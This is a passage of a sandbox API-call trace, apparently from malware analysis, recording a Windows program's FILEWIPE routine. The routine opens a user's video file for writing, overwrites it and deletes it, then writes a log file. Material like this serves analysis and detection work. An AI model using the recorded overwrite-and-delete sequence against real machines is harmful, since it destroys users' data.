wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0044.035] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0044.035] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.035] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0044.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0044.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0044.035] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0044.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0044.035] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0044.035] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0044.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0044.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0044.035] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0044.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0044.036] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0044.036] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0044.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0044.036] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0044.036] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0044.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0044.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0044.036] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0044.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0044.036] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0044.036] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0044.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0044.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0044.036] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0044.036] FreeLibrary (hLibModule=0x754b0000) returned 1 [0044.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0044.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0044.036] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0044.036] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0044.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0044.037] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.037] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.037] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.038] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0044.038] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0044.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0044.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0044.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa8f0da0, ftCreationTime.dwHighDateTime=0x1d5c44f, ftLastAccessTime.dwLowDateTime=0x23ba0970, ftLastAccessTime.dwHighDateTime=0x1d5bc83, ftLastWriteTime.dwLowDateTime=0x23ba0970, ftLastWriteTime.dwHighDateTime=0x1d5bc83, nFileSizeHigh=0x0, nFileSizeLow=0xa3d6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="tvat.swf", cAlternateFileName="")) returned 0x7c2240 [0044.038] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0044.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0044.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0044.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0044.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0044.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.038] CharLowerBuffW (in: lpsz="byte[41942]", cchLength=0xb | out: lpsz="byte[41942]") returned 0xb [0044.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.038] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0044.039] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.039] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0044.039] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0044.039] FreeLibrary (hLibModule=0x76b40000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0044.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0044.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0044.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0044.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0044.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0044.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0044.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0044.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0044.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0044.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0044.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0044.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0044.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0044.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0044.040] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.040] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.040] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.040] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0044.040] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.040] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.040] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.040] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.040] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.040] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.040] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.040] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.040] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.040] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.041] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0044.041] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0044.041] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\tvat.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0044.041] FreeLibrary (hLibModule=0x76e10000) returned 1 [0044.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.041] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0044.041] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.041] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0044.041] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.041] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0044.042] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0044.042] FreeLibrary (hLibModule=0x76e10000) returned 1 [0044.042] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.042] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.042] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.042] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.042] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0044.042] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.042] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0044.042] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0044.042] FreeLibrary (hLibModule=0x76e10000) returned 1 [0044.042] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.042] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0044.043] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.043] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf", lpFilePart=0x0) returned 0x3c [0044.043] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa8f0da0, ftCreationTime.dwHighDateTime=0x1d5c44f, ftLastAccessTime.dwLowDateTime=0x23ba0970, ftLastAccessTime.dwHighDateTime=0x1d5bc83, ftLastWriteTime.dwLowDateTime=0x19f4ce20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xa3d6, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="tvat.swf", cAlternateFileName="")) returned 0x7c2240 [0044.043] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\tvat.swf")) returned 1 [0044.044] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa8f0da0, ftCreationTime.dwHighDateTime=0x1d5c44f, ftLastAccessTime.dwLowDateTime=0x23ba0970, ftLastAccessTime.dwHighDateTime=0x1d5bc83, ftLastWriteTime.dwLowDateTime=0x19f4ce20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xa3d6, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="tvat.swf", cAlternateFileName="")) returned 0 [0044.044] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0044.044] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0044.046] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0044.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0044.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0044.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0044.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0044.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0044.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0044.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0044.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0044.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0044.046] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0044.046] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0044.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0044.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0044.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0044.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0044.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0044.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0044.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0044.047] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0044.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0044.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0044.047] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0044.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0044.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0044.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0044.047] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0044.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0044.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0044.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0044.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0044.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0044.047] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0044.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0044.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0044.047] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0044.047] SetFilePointerEx (in: 